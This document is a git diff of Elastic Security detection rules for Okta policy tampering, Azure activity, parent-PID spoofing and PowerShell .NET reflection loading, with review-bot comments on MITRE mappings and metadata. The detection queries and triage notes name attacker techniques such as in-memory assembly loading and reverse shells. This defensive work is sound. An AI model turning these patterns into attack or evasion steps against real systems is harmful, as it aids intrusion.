+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "323cb487-279d-4218-bcbd-a568efe930c6",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
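Review bot: `"note": ""` keeps the key with an empty string after its only content moved into the new `setup` field; the same pattern is applied in the Okta hunks at L2155, L2157, L2158, L2162 and L2163 and in the new file at L2160. Whether the rule loader treats an absent `note` and an empty one identically is not visible in this diff; if it does, dropping the key is cleaner than shipping an empty investigation guide, and if it does not, the reason for the empty string deserves a sentence in the commit description. The `required_fields` entries (with `azure.activitylogs.operation_name` correctly marked `"ecs": false`) match the three fields the query reads. The enclosing JSON object starts before this hunk.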
@@ -56,5 +81,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json
similarity index 53%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json
index 45605a297987b..61081ee13ad03 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Deactivate an Okta Policy",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:policy.lifecycle.deactivate\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "b719a170-3bdb-4141-b0e3-13e3cf627bfe",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -29,9 +48,34 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Monitoring"
+ "Monitoring",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
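Review bot: The new `threat` block maps deactivating an Okta policy to T1562.007 "Disable or Modify Cloud Firewall", but an Okta policy is a sign-on/MFA policy, not a firewall; the identical mapping is added for the policy-rule, delete-policy, delete-policy-rule, network-zone and modify-policy rules (L2157, L2159, L2160–L2161, L2162, L2163). Since the T1218 rename in this same commit suggests an ATT&CK v11 refresh, T1556.006 (Modify Authentication Process: Multi-Factor Authentication) looks like the closer fit for the policy and policy-rule rules, while the network-zone rule is the one where T1562.007 is most defensible. It would be worth settling the mapping once before it is replicated across six rules, and recording the choice in the commit description. The enclosing JSON object starts before the first hunk.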
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json
similarity index 50%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json
index ba25dde279426..a652bb337b6ec 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Deactivate an Okta Policy Rule",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:policy.rule.deactivate\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "cc92c835-da92-45c9-9f29-b4992ad621a0",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -29,9 +48,34 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Identity and Access"
+ "Identity and Access",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json
similarity index 52%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json
index 47660e2d5d73e..228a3a9d18aca 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Delete an Okta Policy",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:policy.lifecycle.delete\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -29,9 +48,34 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Monitoring"
+ "Monitoring",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json
new file mode 100644
index 0000000000000..c37efcc0b50ad
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json
@@ -0,0 +1,81 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls.",
+ "false_positives": [
+ "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization."
+ ],
+ "index": [
+ "filebeat-*",
+ "logs-okta*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Attempt to Delete an Okta Policy Rule",
+ "note": "",
+ "query": "event.dataset:okta.system and event.action:policy.rule.delete\n",
+ "references": [
+ "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm",
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/"
+ ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "d5d86bf5-cf0c-4c06-b688-53fdc072fdfd",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "low",
+ "tags": [
+ "Elastic",
+ "Identity",
+ "Okta",
+ "Continuous Monitoring",
+ "SecOps",
+ "Monitoring",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 6
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json
similarity index 53%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json
index de94a52a4caa4..695db5c35895c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json
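Review bot: `false_positives` speaks of "Okta MFA rules" while the query fires on every `policy.rule.delete` event regardless of policy type, so the text should probably read "Okta policy rules" to agree with `description` and `name`. A file added as new but carrying `"version": 6` looks like a rename that fell below git's similarity threshold (the sibling Okta rules renamed in this commit sit at 50–53%); if the rule genuinely did not exist before, the version should start at 1, and either way the commit description could say which it is. The `required_fields` list matches the two fields the query reads.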
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Modify an Okta Network Zone",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:(zone.update or network_zone.rule.disabled or zone.remove_blacklist)\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e48236ca-b67a-4b4e-840c-fdc7782bc0c3",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -29,9 +48,34 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Network Security"
+ "Network Security",
+ "Defense Evasion"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": "https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.007",
+ "name": "Disable or Modify Cloud Firewall",
+ "reference": "https://attack.mitre.org/techniques/T1562/007/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
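Review bot: The query only covers `zone.update`, `network_zone.rule.disabled` and `zone.remove_blacklist`, so deactivating or deleting a zone outright — a more direct way to remove the control than editing it — would not fire this rule. The Okta event-types reference listed under `references` is the place to confirm which lifecycle events exist for zones; any deactivate or delete events it lists belong in the same `event.action:(...)` group. The rest of the hunk is metadata moved from `note` into `setup` plus the ATT&CK mapping, which for network zones is a reasonable fit.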
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json similarity index 51% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json index 768d69341e71a..8f5673f6e1ebe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Modify an Okta Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:policy.lifecycle.update\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "6731fbf2-8f28-49ed-9ab9-9a918ceb5a45", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
@@ -28,9 +47,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json new file mode 100644 index 0000000000000..01892bc3fa4c4 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_policy_rule.json 
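Review bot: The new `threat` block maps an Okta policy update to T1562.007 `Disable or Modify Cloud Firewall`, which describes cloud network filtering rather than an identity or authentication policy; the identical block was added to the network-zone rule in this change, where it does fit, so this looks copied rather than chosen. If no sub-technique fits, keeping only the T1562 `Impair Defenses` technique entry is the safer mapping. Relatedly, this rule stays at `risk_score` 21 / `severity` low while the network-zone sibling is 47 / medium, although a policy update can weaken an authentication requirement as effectively as a zone change removes an IP restriction; that difference deserves a deliberate decision rather than inheriting the old values.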
@@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls.", + "false_positives": [ + "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization." + ], + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Modify an Okta Policy Rule", + "note": "", + "query": "event.dataset:okta.system and event.action:policy.rule.update\n", + "references": [ + "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "000047bb-b27a-47ec-8b62-ef1a5d2c9e19", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Identity", + "Okta", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "query", + "version": 8 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json index f03cc4b3f2b06..bd2f8da8af061 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_parent_process_pid_spoofing.json @@ -14,6 +14,63 @@ "references": [ "https://blog.didierstevens.com/2017/03/20/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2", "severity": "high", @@ -49,5 +106,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json index e7df1b3b051a3..a1e8f4f497a9b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_assembly_load.json 
@@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script,\nwhich can circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, 
Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script,\nwhich can circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n )\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell 